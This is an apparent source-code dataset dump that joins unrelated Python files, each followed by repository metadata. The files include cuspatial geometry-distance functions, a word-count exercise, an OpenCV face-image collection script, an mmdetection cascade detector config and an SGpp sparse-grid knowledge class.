... ],
... [
... [[60, 76], [29, 60], [53, 87], [8, 18]],
... [[0, 16], [79, 14], [3, 6], [98, 89]],
... ],
... ]
>>> pts = cuspatial.from_geopandas(
... gpd.GeoSeries(map(MultiPoint, ptsdata))
... )
>>> lines = cuspatial.from_geopandas(
... gpd.GeoSeries(map(MultiLineString, linesdata))
... )
>>> cuspatial.pairwise_point_linestring_distance(pts, lines)
0 0.762984
1 33.241540
2 0.680451
dtype: float64
"""
if not contains_only_points(points):
raise ValueError("`points` array must contain only points")
if not contains_only_linestrings(linestrings):
raise ValueError("`linestrings` array must contain only linestrings")
if len(points.points.xy) > 0 and len(points.multipoints.xy) > 0:
raise NotImplementedError(
"Mixing point and multipoint geometries is not supported"
)
(
point_column,
point_collection_type,
) = _extract_point_column_and_collection_type(points)
return Series._from_data(
{
None: c_pairwise_point_linestring_distance(
point_collection_type,
point_column,
linestrings.lines.column(),
)
}
)
def pairwise_point_polygon_distance(points: GeoSeries, polygons: GeoSeries):
"""Compute distance between (multi)points-(multi)polygons pairs
The distance between a (multi)point and a (multi)polygon
is defined as the shortest distance between every point in the
multipoint and every edge of the (multi)polygon. If the multipoint and
multipolygon intersects, the distance is 0.
This algorithm computes distance pairwise. The ith row in the result is
the distance between the ith (multi)point in `points` and the ith
(multi)polygon in `polygons`.
Parameters
----------
points : GeoSeries
The (multi)points to compute the distance from.
polygons : GeoSeries
The (multi)polygons to compute the distance from.
Returns
-------
distance : cudf.Series
Notes
-----
The input `GeoSeries` must contain a single type geometry.
For example, `points` series cannot contain both points and polygons.
Currently, it is unsupported that `points` contains both points and
multipoints.
Examples
--------
Compute distance between a point and a polygon:
>>> from shapely.geometry import Point
>>> points = cuspatial.GeoSeries([Point(0, 0)])
>>> polygons = cuspatial.GeoSeries([Point(1, 1).buffer(0.5)])
>>> cuspatial.pairwise_point_polygon_distance(points, polygons)
0 0.914214
dtype: float64
Compute distance between a multipoint and a multipolygon
>>> from shapely.geometry import MultiPoint
>>> mpoints = cuspatial.GeoSeries([MultiPoint([Point(0, 0), Point(1, 1)])])
>>> mpolys = cuspatial.GeoSeries([
... MultiPoint([Point(2, 2), Point(1, 2)]).buffer(0.5)])
>>> cuspatial.pairwise_point_polygon_distance(mpoints, mpolys)
0 0.5
dtype: float64
"""
if len(points) != len(polygons):
raise ValueError("Unmatched input geoseries length.")
if len(points) == 0:
return cudf.Series(dtype=points.points.xy.dtype)
if not contains_only_points(points):
raise ValueError("`points` array must contain only points")
if not contains_only_polygons(polygons):
raise ValueError("`polygons` array must contain only polygons")
if len(points.points.xy) > 0 and len(points.multipoints.xy) > 0:
raise NotImplementedError(
"Mixing point and multipoint geometries is not supported"
)
(
points_column,
point_collection_type,
) = _extract_point_column_and_collection_type(points)
polygon_column = polygons.polygons.column()
return Series._from_data(
{
None: c_pairwise_point_polygon_distance(
point_collection_type, points_column, polygon_column
)
}
)
def pairwise_linestring_polygon_distance(
linestrings: GeoSeries, polygons: GeoSeries
):
"""Compute distance between (multi)linestrings-(multi)polygons pairs.
The distance between a (multi)linestrings and a (multi)polygon
is defined as the shortest distance between every segment in the
multilinestring and every edge of the (multi)polygon. If the
multilinestring and multipolygon intersect, the distance is 0.
This algorithm computes distance pairwise. The ith row in the result is
the distance between the ith (multi)linestring in `linestrings` and the ith
(multi)polygon in `polygons`.
Parameters
----------
linestrings : GeoSeries
The (multi)linestrings to compute the distance from.
polygons : GeoSeries
The (multi)polygons to compute the distance from.
Returns
-------
distance : cudf.Series
Notes
-----
The input `GeoSeries` must contain a single type geometry.
For example, `linestrings` series cannot contain both linestrings and
polygons.
Examples
--------
Compute distance between a linestring and a polygon:
>>> from shapely.geometry import LineString, Polygon
>>> lines = cuspatial.GeoSeries([
... LineString([(0, 0), (1, 1)])])
>>> polys = cuspatial.GeoSeries([
... Polygon([(-1, -1), (-1, 0), (-2, 0), (-1, -1)])
... ])
>>> cuspatial.pairwise_linestring_polygon_distance(lines, polys)
0 1.0
dtype: float64
Compute distance between a multipoint and a multipolygon
>>> from shapely.geometry import MultiLineString, MultiPolygon
>>> lines = cuspatial.GeoSeries([
... MultiLineString([
... LineString([(0, 0), (1, 1)]),
... LineString([(1, 1), (2, 2)])])
... ])
>>> polys = cuspatial.GeoSeries([
... MultiPolygon([
... Polygon([(-1, -1), (-1, 0), (-2, 0), (-1, -1)]),
... Polygon([(-2, 0), (-3, 0), (-3, -1), (-2, 0)])])
... ])
>>> cuspatial.pairwise_linestring_polygon_distance(lines, polys)
0 1.0
dtype: float64
"""
if len(linestrings) != len(polygons):
raise ValueError("Unmatched input geoseries length.")
if len(linestrings) == 0:
return cudf.Series(dtype=linestrings.lines.xy.dtype)
if not contains_only_linestrings(linestrings):
raise ValueError("`linestrings` array must contain only linestrings")
if not contains_only_polygons(polygons):
raise ValueError("`polygon` array must contain only polygons")
linestrings_column = linestrings.lines.column()
polygon_column = polygons.polygons.column()
return Series._from_data(
{None: c_pairwise_line_poly_dist(linestrings_column, polygon_column)}
)
def pairwise_polygon_distance(polygons1: GeoSeries, polygons2: GeoSeries):
"""Compute distance between (multi)polygon-(multi)polygon pairs.
The distance between two (multi)polygons is defined as the shortest
distance between any edge of the first (multi)polygon and any edge
of the second (multi)polygon. If two (multi)polygons intersect, the
distance is 0.
This algorithm computes distance pairwise. The ith row in the result is
the distance between the ith (multi)polygon in `polygons1` and the ith
(multi)polygon in `polygons2`.
Parameters
----------
polygons1 : GeoSeries
The (multi)polygons to compute the distance from.
polygons2 : GeoSeries
The (multi)polygons to compute the distance from.
Returns
-------
distance : cudf.Series
Notes
-----
`polygons1` and `polygons2` must contain only polygons.
Examples
--------
Compute distance between polygons:
>>> from shapely.geometry import Polygon, MultiPolygon
>>> s0 = cuspatial.GeoSeries([
... Polygon([(0, 0), (1, 0), (1, 1), (0, 1), (0, 0)])])
>>> s1 = cuspatial.GeoSeries([
... Polygon([(2, 2), (3, 2), (3, 3), (2, 2)])])
>>> cuspatial.pairwise_polygon_distance(s0, s1)
0 1.414214
dtype: float64
Compute distance between multipolygons:
>>> s0 = cuspatial.GeoSeries([
... MultiPolygon([
... Polygon([(0, 0), (1, 0), (1, 1), (0, 1), (0, 0)]),
... Polygon([(2, 0), (3, 0), (3, 1), (2, 0)])])])
>>> s1 = cuspatial.GeoSeries([
... MultiPolygon([
... Polygon([(-1, 0), (-2, 0), (-2, -1), (-1, -1), (-1, 0)]),
... Polygon([(0, -1), (1, -1), (1, -2), (0, -2), (0, -1)])])])
>>> cuspatial.pairwise_polygon_distance(s0, s1)
0 1.0
dtype: float64
"""
if len(polygons1) != len(polygons2):
raise ValueError("Unmatched input geoseries length.")
if len(polygons1) == 0:
        return cudf.Series(dtype=polygons1.polygons.xy.dtype)
if not contains_only_polygons(polygons1):
raise ValueError("`polygons1` array must contain only polygons")
if not contains_only_polygons(polygons2):
raise ValueError("`polygons2` array must contain only polygons")
polygon1_column = polygons1.polygons.column()
polygon2_column = polygons2.polygons.column()
return Series._from_data(
{None: c_pairwise_polygon_distance(polygon1_column, polygon2_column)}
)
def _extract_point_column_and_collection_type(s: GeoSeries):
"""Given a GeoSeries that contains only points or multipoints, return
the point or multipoint column and the collection type of the GeoSeries.
"""
point_collection_type = (
        CollectionType.SINGLE if len(s.points.xy) > 0 else CollectionType.MULTI
)
if point_collection_type == CollectionType.SINGLE:
return s.points.column(), point_collection_type
else:
return s.multipoints.column(), point_collection_type
|
[
"noreply@github.com"
] |
rapidsai.noreply@github.com
|
07e7df0816c1957b767384afad42bcae44dc81fd
|
1b966dfe5516ac1cc080ff9305104b0b31463f00
|
/word-count/word_count.py
|
ddb6e542a8ddff1c3263eef9c7623f8ad95d3b5e
|
[] |
no_license
|
Nephasis/exercismPython
|
877f9b0906b6882c99a747f98124bcea3c4cbeeb
|
4ca9481ceb555c7b7427d255500720a938d47f25
|
refs/heads/master
| 2021-07-06T09:55:16.483723
| 2017-10-02T16:52:35
| 2017-10-02T16:52:35
| 105,559,939
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 423
|
py
|
import re
def words_split(sentence):
words = re.sub("[^a-zA-Z0-9]", " ", sentence.lower()).split()
return words
def word_count(sentence):
    words_dict = {}
    words = words_split(sentence)
    for word in words:
        # increment the running tally for each occurrence of the word
        words_dict[word] = words_dict.get(word, 0) + 1
    return words_dict
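# Hedged usage sketch (added for illustration): exercising word_count on a
# short sentence.
if __name__ == "__main__":
    print(word_count("olly olly in come free"))
    # -> {'olly': 2, 'in': 1, 'come': 1, 'free': 1}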
|
[
"martyna.zaa@gmail.com"
] |
martyna.zaa@gmail.com
|
c610d3b2b1ed632057809c123585fd8cbb40363f
|
cdcb58cddf422079e27550d4db344cb634b2806e
|
/record_facesepimg.py
|
537d43c5025c048e8d51f4ac09bb17b336dbefb3
|
[] |
no_license
|
JeeveshJoshi/Home-Security-Solution-Using-Facial-Recognition
|
a26a468b131c11efcffae97d1fb8a87702d46e76
|
e2028d4fa5f783d4c6f590ce643ed65fffe40502
|
refs/heads/master
| 2022-08-06T23:59:10.928273
| 2020-05-28T17:51:50
| 2020-05-28T17:51:50
| 267,657,536
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 936
|
py
|
import cv2
import numpy as np
import sqlite3
import os
conn = sqlite3.connect('database.db')
if not os.path.exists('./dataset'):
os.makedirs('./dataset')
c = conn.cursor()
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
cap = cv2.VideoCapture('t2.mp4')
uname = input("Enter your name: ")
c.execute('INSERT INTO users (name) VALUES (?)', (uname,))
uid = c.lastrowid
sampleNum = 0
while True:
    ret, img = cap.read()
    if not ret:
        # stop once the video has no more frames to read
        break
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y,w,h) in faces:
sampleNum = sampleNum+1
cv2.imwrite("dataset/User."+str(uid)+"."+str(sampleNum)+".jpg",gray[y:y+h,x:x+w])
cv2.rectangle(img, (x,y), (x+w, y+h), (255,0,0), 2)
cv2.waitKey(100)
cv2.imshow('img',img)
cv2.waitKey(1);
if sampleNum > 150:
break
cap.release()
conn.commit()
conn.close()
cv2.destroyAllWindows()
|
[
"noreply@github.com"
] |
JeeveshJoshi.noreply@github.com
|
205b5a1ec4dae46d7dc21465fb1acc9354c8e8a4
|
244ecfc2017a48c70b74556be8c188e7a4815848
|
/res/scripts/client/gui/prb_control/functional/__init__.py
|
3c9b3da695003de294a48c0ffe4eae03d5b61bb6
|
[] |
no_license
|
webiumsk/WOT-0.9.12
|
c1e1259411ba1e6c7b02cd6408b731419d3174e5
|
5be5fd9186f335e7bae88c9761c378ff5fbf5351
|
refs/heads/master
| 2021-01-10T01:38:36.523788
| 2015-11-18T11:33:37
| 2015-11-18T11:33:37
| 46,414,438
| 1
| 0
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 820
|
py
|
# 2015.11.18 11:52:50 Central Europe (standard time)
# Embedded file name: scripts/client/gui/prb_control/functional/__init__.py
from constants import IS_DEVELOPMENT
def initDevFunctional():
if IS_DEVELOPMENT:
try:
from gui.development.dev_prebattle import init
except ImportError:
def init():
pass
init()
def finiDevFunctional():
if IS_DEVELOPMENT:
try:
from gui.development.dev_prebattle import fini
except ImportError:
def fini():
pass
fini()
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\prb_control\functional\__init__.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.18 11:52:50 Central Europe (standard time)
|
[
"info@webium.sk"
] |
info@webium.sk
|
784f981f27b845d2b714770887c997029b4fbecb
|
f6763d51437acf9b44eba1fe571f13a06439167f
|
/ses3d/make_stations.py
|
394d334d11f2d82c700a9fea8a301f9ffbc41098
|
[] |
no_license
|
xian-ran/seis_tools
|
335566f71eb975dab43c9b6c17b0a865be02581a
|
3a7b3f6b35e6d137924e8e95c6fac56681f772dc
|
refs/heads/master
| 2020-11-24T19:26:10.994293
| 2019-04-01T18:28:18
| 2019-04-01T18:28:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,820
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
#=======================================================
# Create grid of receivers for SES3d
#=======================================================
depth = 0.0
rec_names = []
rec_coors = []
#main station grid
d_lon = 0.5
d_lat = 0.5
lon_0 = -15.0
lon_e = 15.0
colat_0 = 75
colat_e = 105
lon = np.arange(lon_0,lon_e+(1*d_lon),d_lon)
colat = np.arange(colat_0,colat_e+(1*d_lat),d_lat)
#sparse station grid
d_lon2 = 3.0
d_lat2 = 3.0
lon2_0 = -30.0
lon2_e = 30.0
colat2_0 = 60.0
colat2_e = 120.0
lon2 = np.arange(lon2_0,lon2_e+(1*d_lon2),d_lon2)
colat2 = np.arange(colat2_0,colat2_e+(1*d_lat2),d_lat2)
total_receivers = len(lon)*len(colat) + len(lon2)*len(colat2)
m = Basemap(projection='ortho',lon_0=0.0,lat_0=0.0)
m.drawcoastlines()
parallels = np.arange(-90,90,15)
m.drawparallels(parallels)
meridians = np.arange(-90,90,15)
m.drawmeridians(meridians)
count = 1
for l in lon:
for c in colat:
rec_name = '{}''{:_>9}'.format('REC',str(count))
rec_coor = '{} {} {}'.format(c, l, depth)
rec_names.append(rec_name)
rec_coors.append(rec_coor)
count += 1
x1,y1 = m(l,90.0-c)
m.scatter(x1,y1)
for l in lon2:
for c in colat2:
if c < 75.0 or c > 105.0 or l < -15.0 or l > 15.0:
rec_name = '{}''{:_>9}'.format('REC',str(count))
rec_coor = '{} {} {}'.format(c, l, depth)
rec_names.append(rec_name)
rec_coors.append(rec_coor)
count += 1
x1,y1 = m(l,90.0-c)
m.scatter(x1,y1)
#write the station file
f = open('recfile_1','w')
f.write(str(len(rec_names))+'\n')
for i in range(0,len(rec_names)):
f.write(rec_names[i]+'\n')
f.write(rec_coors[i]+'\n')
plt.show()
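# ---------------------------------------------------------------------------
# Sanity check of the receiver counts implied above (illustration only): the
# main grid spans 61 x 61 = 3721 stations at 0.5 deg spacing, the sparse grid
# spans 21 x 21 = 441 candidates of which the 11 x 11 = 121 falling inside the
# main window are skipped, so 3721 + 320 = 4041 receivers are written to
# 'recfile_1'. The unused variable total_receivers counts all 4162 candidates
# without removing that overlap.
# ---------------------------------------------------------------------------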
|
[
"romaguir@porphyroblast.earth.lsa.umich.edu"
] |
romaguir@porphyroblast.earth.lsa.umich.edu
|
be412d528058f753a7b389f8cbfce506b85546f3
|
ae792370eceb39e303e6751ed596bc91b5571d47
|
/src/get_feature/configs/guided_anchoring/ga_htc.py
|
08d50332122224939af0155e01831545cb4a0727
|
[
"Apache-2.0"
] |
permissive
|
13282803166/-
|
587d2e0c10a1f2b3f22d181cc3386aa4f0e001f7
|
e0fdef286d5342ebaec2fe308f4c6f8994d559d1
|
refs/heads/main
| 2023-01-12T04:31:40.662915
| 2020-11-16T11:02:08
| 2020-11-16T11:02:08
| 313,269,308
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,553
|
py
|
# model settings
model = dict(
type='HybridTaskCascade',
pretrained='open-mmlab://resnext101_32x4d',
interleaved=True,
num_stages=3,
backbone=dict(
type='ResNeXt',
depth=101,
groups=32,
base_width=4,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=-1,
style='pytorch',
gen_attention=dict(spatial_range=-1, num_heads=8, attention_type='1111', kv_stride=2),
stage_with_gen_attention=[[], [], [0, 1, 2, 3, 4, 5], [0, 1, 2]],
dcn=dict(modulated=False, groups=32, deformable_groups=1, fallback_on_stride=False),
stage_with_dcn=(False, True, True, True)),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='GARPNHead',
in_channels=256,
feat_channels=256,
octave_base_scale=8,
scales_per_octave=3,
octave_ratios=[0.04, 0.1, 0.25, 0.5, 1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 64.0],
anchor_strides=[4, 8, 16, 32, 64],
anchor_base_sizes=None,
anchoring_means=[.0, .0, .0, .0],
anchoring_stds=[0.07, 0.07, 0.14, 0.14],
target_means=(.0, .0, .0, .0),
target_stds=[0.07, 0.07, 0.11, 0.11],
loc_filter_thr=0.01,
loss_loc=dict(type='FocalLoss', use_sigmoid=True, gamma=2.0, alpha=0.25, loss_weight=1.0),
loss_shape=dict(type='BoundedIoULoss', beta=0.2, loss_weight=1.0),
loss_cls=dict(type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=[
dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2],
reg_class_agnostic=True,
loss_cls=dict(type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0.],
target_stds=[0.05, 0.05, 0.1, 0.1],
reg_class_agnostic=True,
loss_cls=dict(type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0.],
target_stds=[0.033, 0.033, 0.67, 0.67],
reg_class_agnostic=True,
loss_cls=dict(type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))
])
# model training and testing settings
train_cfg = dict(
rpn=dict(
ga_assigner=dict(
type='ApproxMaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
ga_sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=-1,
pos_weight=-1,
center_ratio=0.2,
ignore_ratio=0.5,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=300,
nms_thr=0.7,
min_bbox_size=0),
rcnn=[
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='OHEMSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.6,
neg_iou_thr=0.6,
min_pos_iou=0.6,
ignore_iof_thr=-1),
sampler=dict(
type='OHEMSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.7,
min_pos_iou=0.7,
ignore_iof_thr=-1),
sampler=dict(
type='OHEMSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False)
],
stage_loss_weights=[1, 0.5, 0.25])
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=1000,
nms_post=1000,
max_num=300,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(score_thr=0.05, nms=dict(type='nms', iou_thr=0.3), max_per_img=300),
keep_all_stages=False)
# dataset settings
dataset_type = 'VOCDataset'
data_root = '../../data/'
img_norm_cfg = dict(mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(
type='Resize',
img_scale=[(1024, 424), (2048, 848)],
multiscale_mode='range',
keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
#dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1536, 636), #0.5183
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=1,
workers_per_gpu=1,
train=dict(
type=dataset_type,
ann_file=data_root + 'ImageSets/Main/trainval.txt',
img_prefix=data_root,
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'ImageSets/Main/val.txt',
img_prefix=data_root,
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'ImageSets/Main/val.txt',
img_prefix=data_root,
pipeline=test_pipeline))
# optimizer
optimizer = dict(type='SGD', lr=0.0025, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[13, 16])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 17
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/get_feature'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
[
"75088620@qq.com"
] |
75088620@qq.com
|
070247a137b4ed8efb5298e3b5558eb09767c14e
|
e37a4775935435eda9f176c44005912253a720d8
|
/datadriven/python/uq/analysis/asgc/ASGCKnowledge.py
|
2d5cee2138bd18097ee69c0b5a83f398141e11a7
|
[] |
no_license
|
JihoYang/SGpp
|
b1d90d2d9e8f8be0092e1a9fa0f37a5f49213c29
|
7e547110584891beed194d496e23194dd90ccd20
|
refs/heads/master
| 2020-04-25T10:27:58.081281
| 2018-09-29T19:33:13
| 2018-09-29T19:33:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,745
|
py
|
import numpy as np
from pysgpp.extensions.datadriven.uq.analysis import KnowledgeTypes
from pysgpp.extensions.datadriven.uq.operations.sparse_grid import copyGrid
from pysgpp import DataVector, Grid
import pysgpp.extensions.datadriven.uq.jsonLib as ju
import pysgpp.extensions.datadriven.utils.json as json
from pysgpp.extensions.datadriven.uq.analysis.asgc.ASGCKnowledgeFormatter import ASGCKnowledgeFormatter
class ASGCKnowledge(object):
"""
The ASGC knowledge class
"""
def __init__(self):
"""
Constructor
"""
# {iteration: {qoi: <Grid>}}
self.__grids = {}
# {iteration: {qoi: {dtype: {t: <DataVector>}}}}
self.__alphas = {}
self.__iteration = 0
@classmethod
def initWithStandardValues(cls, grid, alpha):
ans = ASGCKnowledge()
ans.update(grid, alpha, "_", 0, KnowledgeTypes.SIMPLE, 0)
return ans
def getAvailableQoI(self):
"""
get available quantities of interest
@return: list of strings identifying the quantities of interest
"""
if len(self.__alphas) == 0:
raise Exception('No knowledge available')
iteration = self.__alphas.iterkeys().next()
return self.__alphas[iteration].keys()
def getAvailableTimeSteps(self):
"""
get available time steps
@return: sorted list of floats
"""
if len(self.__alphas) == 0:
raise Exception('No knowledge available')
iteration = self.__alphas.iterkeys().next()
qoi = self.__alphas[iteration].iterkeys().next()
dtype = self.__alphas[iteration][qoi].iterkeys().next()
ts = self.__alphas[self.__iteration][qoi][dtype].keys()
return sorted(ts)
def getAvailableKnowledgeTypes(self):
"""
@return list of available KnowledgeTypes
"""
if len(self.__alphas) == 0:
raise Exception('No knowledge available')
iteration = self.__alphas.iterkeys().next()
qoi = self.__alphas[iteration].iterkeys().next()
return self.__alphas[iteration][qoi].keys()
def getAvailableIterations(self):
"""
get available iterations
        @return: sorted list of integers
"""
return self.__grids.keys()
def getIteration(self):
"""
get current iteration number
"""
return self.__iteration
def setIteration(self, iteration):
"""
set current iteration number
"""
self.__iteration = iteration
def hasAlpha(self, iteration, qoi, t, dtype):
"""
Check if there is a coefficient vector for the given
configuration.
@param iteration: int iteration number
@param qoi: string quantity of interest
@param t: float time step
@param dtype: KnowledgeType
"""
return iteration in self.__alphas and \
qoi in self.__alphas[iteration] and \
dtype in self.__alphas[iteration][qoi] and \
t in self.__alphas[iteration][qoi][dtype]
def hasGrid(self, iteration, qoi):
"""
Check if there is a grid available for the given configuration
@param iteration: int iteration number
@param qoi: string quantity of interest
"""
return iteration in self.__grids and \
qoi in self.__grids[iteration]
def getGrid(self, qoi='_', iteration=None):
"""
Get the grid for the given configuration
@param qoi: string quantity of interest
@param iteration: int, iteration number
"""
if iteration is None:
iteration = self.__iteration
if self.hasGrid(iteration, qoi):
return self.__grids[iteration][qoi]
else:
raise AttributeError('no grid for (i=%i, qoi=%s)' % (iteration,
qoi))
def getAlpha(self, qoi='_', t=0, dtype=KnowledgeTypes.SIMPLE,
iteration=None):
"""
Get the coefficient vector for the given configuration
@param qoi: string quantity of interest
@param t: float time step
@param dtype: KnowledgeType
@param iteration: int, iteration number
"""
if iteration is None:
iteration = self.__iteration
if self.hasAlpha(iteration, qoi, t, dtype):
return self.__alphas[iteration][qoi][dtype][t]
else:
raise AttributeError('no knowledge for (i=%i, t=%g, qoi=%s, dtype=%i)' % (iteration, t, qoi,
dtype))
def getAlphasByQoI(self, qoi='_', dtype=KnowledgeTypes.SIMPLE,
iteration=None):
"""
Get all coefficient vectors for the given quantity of interest
@param qoi: string quantity of interest
@param iteration: int, iteration number
"""
if iteration is None:
iteration = self.__iteration
if qoi in self.__alphas[iteration] and \
dtype in self.__alphas[iteration][qoi]:
return self.__alphas[iteration][qoi][dtype]
else:
            raise AttributeError('no knowledge for (i=%i, qoi=%s, dtype=%s)' % (iteration, qoi,
                                                                                KnowledgeTypes.toString(dtype)))
def getSparseGridFunction(self, qoi='_', t=0, dtype=KnowledgeTypes.SIMPLE,
iteration=None):
"""
Get the sparse grid function (grid, alpha) for the given setting
@param qoi: string quantity of interest
@param t: float time step
@param dtype: KnowledgeType
@param iteration: int, iteration number
"""
if iteration is None:
iteration = self.__iteration
# check if there is the desired grid
if self.hasGrid(iteration, qoi):
grid = self.getGrid(qoi, iteration=iteration)
else:
raise AttributeError('the grid for (i=%i, qoi=%s) does not exist' % (iteration, qoi))
# check if there is the desired surplus vector
if self.hasAlpha(iteration, qoi, t, dtype):
alpha = self.getAlpha(qoi, t, dtype, iteration=iteration)
else:
raise AttributeError('the surplus vector for (i=%i, qoi=%s, t=%g, dtype=%i) does not exist'
% (iteration, qoi, t, dtype))
return grid, alpha
def getAlphas(self):
return self.__alphas
def setAlphas(self, alphas):
self.__alphas = alphas
def getGrids(self):
return self.__grids
def setGrids(self, grids):
self.__grids = grids
def update(self, grid, alpha, qoi, t, dtype, iteration):
"""
Update the knowledge
@param grid: Grid
@param alpha: numpy array surplus vector
@param qoi: string quantity of interest
@param t: float time step
@param dtype: KnowledgeType
@param iteration: int iteration number
"""
# build dictionary
if iteration not in self.__alphas:
self.__alphas[iteration] = {}
self.__grids[iteration] = {}
if qoi not in self.__alphas[iteration]:
self.__alphas[iteration][qoi] = {}
self.__grids[iteration][qoi] = {}
if dtype not in self.__alphas[iteration][qoi]:
self.__alphas[iteration][qoi][dtype] = {}
if t not in self.__alphas[iteration][qoi][dtype]:
self.__alphas[iteration][qoi][dtype][t] = {}
# store knowledge
self.__iteration = iteration
self.__grids[iteration][qoi] = grid.clone()
self.__alphas[iteration][qoi][dtype][t] = np.array(alpha)
def clearAlphas(self):
self.__alphas = {}
# ----------------------------------------------------------------
# ASGCKnowledge File Formatter
# ----------------------------------------------------------------
def setMemento(self, memento):
"""
Restores the state which is saved in the given memento
@param memento: the memento object
"""
self.fromJson(memento)
def createMemento(self):
"""
Creates a new memento to hold the current state
"""
jsonString = self.toJson()
jsonObject = json.JsonReader().read(jsonString)
return jsonObject
def writeToFile(self, filename):
"""
Write knowledge object to file
"""
m = self.createMemento()
ASGCKnowledgeFormatter().serializeToFile(m, filename)
@classmethod
def fromJson(cls, jsonObject):
"""
Restores the ASGC object from the json object with its
attributes.
@param jsonObject: json object
@return: the restored ASGC object
"""
knowledge = ASGCKnowledge()
# restore iteration
key = '_ASGCKnowledge__iteration'
if key in jsonObject:
knowledge.setIteration(int(jsonObject[key]))
# restore surpluses: {iteration: {qoi: {dtype: {t: <Grid>}}}}
key = '_ASGCKnowledge__grids'
if key in jsonObject:
grids = {}
for iteration, v1 in jsonObject[key].items():
d1 = {}
for qoi, gridString in v1.items():
# undo the hack that made it json compatible
gridString = gridString.replace('__', '\n')\
.encode('utf8')
# deserialize ...
grid = Grid.unserialize(gridString)
# ... and store it
d1[qoi] = grid
grids[int(iteration)] = d1
knowledge.setGrids(grids)
